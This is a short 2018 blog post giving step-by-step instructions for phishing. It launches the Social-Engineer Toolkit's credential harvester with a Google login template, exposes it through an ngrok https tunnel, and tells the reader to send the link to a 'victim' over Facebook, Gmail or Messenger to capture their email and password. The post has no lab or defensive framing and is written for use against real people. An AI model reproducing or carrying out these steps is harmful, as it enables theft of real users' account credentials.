Monday, September 3, 2018

Phishing Websites Around Internet Using https

Phishing is a powerful and easy way to obtain any type of sensitive data, Such as Emails, Username, Password even a credit card number and  OTPs(One Time Password) etc..Phishing is a technique were hackers send their victim to a malicious page using malicious URL  with the help of social engineering. The malicious page that is sent to the victim is the duplicate pages which replicates the actual page. By which the victim fall into the trap of the hackers and the victim enters the data, all the data entered by the victim transferred to the hackers and the page redirects to the actual site.

Phishing website
Phishing - Alert


So let's get started

Open a terminal
and type

root@error502:~# setoolkit
Now select option: -1
   1) Social-Engineering Attacks

Now select option: -2
   2) Website Attack Vectors

Now select option: -3
   3) Credential Harvester Attack Method


and the option: -1
   1) Web Templates

Now open a new terminal and type the following command
root@error502:~# ngrok http 80

Now copy any, One URL from two of them, It will look something like this

Forwarding                    http//4bb2da7c.ngrok.io -> localhost:80                                       
Forwarding                    https//4bb2da7c.ngrok.io -> localhost:80

copy one of this and paste it in the terminal and hit enter


Now select option: -2
 2. Google



copy the generated URL

now send the generated URL to your victim
using any source like
Facebook, Gmail, Messenger, etc...

wait till your victim opens the URL  and
Enter his "Email" and "Password"











2 comments: